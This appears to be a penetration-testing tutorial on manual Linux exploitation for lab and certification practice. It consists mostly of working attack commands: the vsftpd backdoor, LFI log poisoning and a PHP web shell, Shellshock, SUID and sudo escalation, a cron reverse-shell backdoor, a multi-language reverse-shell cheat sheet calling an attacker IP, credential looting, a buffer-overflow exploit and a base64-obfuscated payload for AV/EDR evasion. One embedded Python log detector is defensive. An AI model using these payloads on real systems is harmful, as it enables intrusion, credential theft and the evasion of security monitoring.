Manual Exploitation for Pentesters: Linux Edition
Metasploit is powerful, but real pentesters know how to operate without it. Whether you’re on a system where it’s not allowed, prepping for a cert like OSCP, or just want to understand how the mother f*cker gets hacked—this guide will walk you through manual exploitation from start to shell, with nothing but raw tools and skill.
Table of Contents
- Why Go Manual?
- Recon & Enumeration
- Service-by-Service Exploitation
- Getting and Managing a Shell
- Privilege Escalation
- Post-Exploitation: Looting & Cleanup
- Buffer Overflow Basics (Manual)
- Stealth Tips: AV/EDR Evasion
- TryHackMe Labs for Practice
- Conclusion
Why Go Manual?
- Real Understanding – Learn how exploits actually work.
- Less Detection – Tools like netcat and curl don't trip alarms like Metasploit.
- Cert Prep – OSCP limits Metasploit use to one exploit.
- Raw Power – Manual is flexible, adaptable, and battle-tested.
Recon & Enumeration
Basic Nmap
nmap -sC -sV -oN nmap_basic.txt 10.10.10.10
Service Fingerprinting
| Protocol | Tool |
|---|---|
| FTP | ftp, nc, nmap -p21 --script ftp* |
| HTTP | curl, nikto, gobuster, whatweb, dirb, ffuf |
| SMB | enum4linux, smbclient, rpcclient, nmap --script smb* |
| SSH | Banner grabbing + brute force with hydra or ncrack |
| DNS | dig, dnsrecon, nslookup |
Brute Force Example
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid credentials"
Service-by-Service Exploitation
FTP – VSFTPD 2.3.4
Banner Grab:
nc -nv 10.10.10.10 21
Exploit the Backdoor:
telnet 10.10.10.10 21
# USER whatever:)
# PASS whatever
Get Shell:
nc 10.10.10.10 6200
HTTP – LFI to RCE
1. LFI Read:
curl http://10.10.10.10/index.php?page=../../../../etc/passwd
2. Log Poisoning for RCE:
# Single-quote the header: inside double quotes the shell would expand $_GET to nothing
curl -A '<?php system($_GET["cmd"]); ?>' http://10.10.10.10
curl "http://10.10.10.10/index.php?page=/var/log/apache2/access.log&cmd=id"
3. PHP Web Shell Upload:
<?php system($_GET['cmd']); ?>
Access:
curl "http://10.10.10.10/uploads/shell.php?cmd=whoami"
Directory Bruteforce:
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt
SMB – Null Sessions & Remote Execution
List Shares:
smbclient -L //10.10.10.10/ -N
Access Share:
smbclient //10.10.10.10/anonymous -N
Remote Shell with Creds:
impacket-psexec user:pass@10.10.10.10
Shellshock (CVE-2014-6271)
curl -H 'User-Agent: () { :; }; /bin/bash -c "id"' http://10.10.10.10/cgi-bin/vulnerable.cgi
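Seen from the server side, each step of the LFI-to-RCE chain above and the Shellshock probe leaves a distinct trace in Apache's access log. The detector below is an added example, not part of the original guide; the log lines are constructed to mirror those requests, and the rule names and functions are my own.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-log lines (not from a real server): a normal hit, the LFI read,
# the User-Agent poisoning request, the include of the poisoned log, and a Shellshock probe.
# Apache writes a literal quote inside the User-Agent as \".
SAMPLE_LOG = r'''
10.10.14.25 - - [01/Jan/2025:10:00:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.25 - - [01/Jan/2025:10:00:01 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1832 "-" "curl/8.0"
10.10.14.25 - - [01/Jan/2025:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php system($_GET['cmd']); ?>"
10.10.14.25 - - [01/Jan/2025:10:00:03 +0000] "GET /index.php?page=/var/log/apache2/access.log&cmd=id HTTP/1.1" 200 60 "-" "curl/8.0"
10.10.14.25 - - [01/Jan/2025:10:00:04 +0000] "GET /cgi-bin/vulnerable.cgi HTTP/1.1" 200 12 "-" "() { :; }; /bin/bash -c \"id\""
'''.strip()

# Combined log format: ip ident user [time] "method path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)

def classify(rec):
    """Return the attack indicators found in one parsed log record."""
    tags = []
    # parse_qs URL-decodes once; unquote again so double-encoded %252e%252e%252f is caught too
    values = [unquote(v) for vs in parse_qs(urlsplit(rec["path"]).query).values() for v in vs]
    # LFI: a parameter walking up the tree or naming a system or log file directly
    if any("../" in v or v.startswith(("/etc/", "/var/log/", "/proc/")) for v in values):
        tags.append("lfi")
    # Log poisoning: a PHP open tag in a header Apache writes verbatim to access.log
    if "<?php" in rec["ua"] or "<?=" in rec["ua"]:
        tags.append("log_poisoning")
    # Shellshock (CVE-2014-6271): the bash function-definition prefix "() {" in a header
    if re.search(r"\(\)\s*\{", rec["ua"]):
        tags.append("shellshock")
    return tags

def scan(log_text):
    """Parse each line and return (ip, path, tags) for every line that matches a rule."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line (e.g. a truncated write): skip it, never crash the scan
        rec = m.groupdict()
        tags = classify(rec)
        if tags:
            hits.append((rec["ip"], rec["path"], tags))
    return hits
```

`scan(SAMPLE_LOG)` flags four of the five constructed lines; the first, a normal page load, produces no tags.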
SUID, Cron, NFS
SUID Binaries:
find / -perm -4000 -type f 2>/dev/null
Exploit:
find . -exec /bin/sh -p \; -quit
Cron Job Backdoor:
echo "bash -i >& /dev/tcp/10.10.14.25/4444 0>&1" > /tmp/root.sh
chmod +x /tmp/root.sh
Getting and Managing a Shell
Upgrade Netcat Shell
# In shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL+Z
# In your terminal:
stty raw -echo
fg
export TERM=xterm
Reverse Shell Cheatsheet
| Language | Payload |
|---|---|
| Bash | bash -i >& /dev/tcp/10.10.14.25/4444 0>&1 |
| Python | python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("10.10.14.25",4444)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(["/bin/bash"])' |
| PHP | php -r '$sock=fsockopen("10.10.14.25",4444);exec("/bin/sh -i <&3 >&3 2>&3");' |
| Perl | perl -e 'use Socket;$i="10.10.14.25";$p=4444;...' |
Privilege Escalation
Basic Checks
whoami
id
uname -a
sudo -l
Manual Looting
cat ~/.bash_history
cat /etc/passwd
grep -i pass /etc/* 2>/dev/null
find / -name "*id_rsa*" 2>/dev/null
LinPEAS / LinEnum
wget http://10.10.14.25/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
Exploit Sudo Rights
sudo /usr/bin/vim
# :!bash
Post-Exploitation: Looting & Cleanup
Credentials & Sensitive Files
cat /var/www/html/config.php
grep -i "password" /var/* 2>/dev/null
Pivoting
ssh -L 1080:127.0.0.1:9050 user@pivot-host
Cleanup
- Remove shells: rm shell.php
- Remove cron backdoors
- Exit gracefully
Buffer Overflow Basics (Manual)
#include <stdlib.h>   /* system() */
#include <string.h>   /* strcpy() */
void secret(void) { system("/bin/sh"); }  /* never called; reached only by overwriting the saved return address */
int main(int argc, char *argv[]) {
    char buffer[64];
    if (argc < 2) return 1;
    strcpy(buffer, argv[1]);  /* no bounds check: a long argv[1] writes past buffer into the return address */
    return 0;
}
Compile:
# -fno-stack-protector disables the stack canary, -z execstack marks the stack executable
gcc -fno-stack-protector -z execstack vuln.c -o vuln
Exploit:
# "\xef\xbe\xad\xde" is a placeholder for the address of secret() in little-endian order (0xdeadbeef);
# replace it with the real address. print() would UTF-8-encode those bytes, so write raw bytes instead:
./vuln $(python3 -c 'import sys; sys.stdout.buffer.write(b"A"*72 + b"\xef\xbe\xad\xde")')
Stealth Tips: AV/EDR Evasion (Manual)
Obfuscate Payload
echo 'bash -i >& /dev/tcp/10.10.14.25/4444 0>&1' | base64
# Decode & execute on target:
echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yNS80NDQ0IDA+JjE=' | base64 -d | bash
TryHackMe Labs for Practice
Conclusion
Manual exploitation makes you sharper, stealthier, and more capable. Tools help, but skills win. Every command you run by hand teaches you how the system really works—and that’s the difference between a script kiddie and a true offensive cyber professional.
If you can root a box without Metasploit, you can root it with anything.
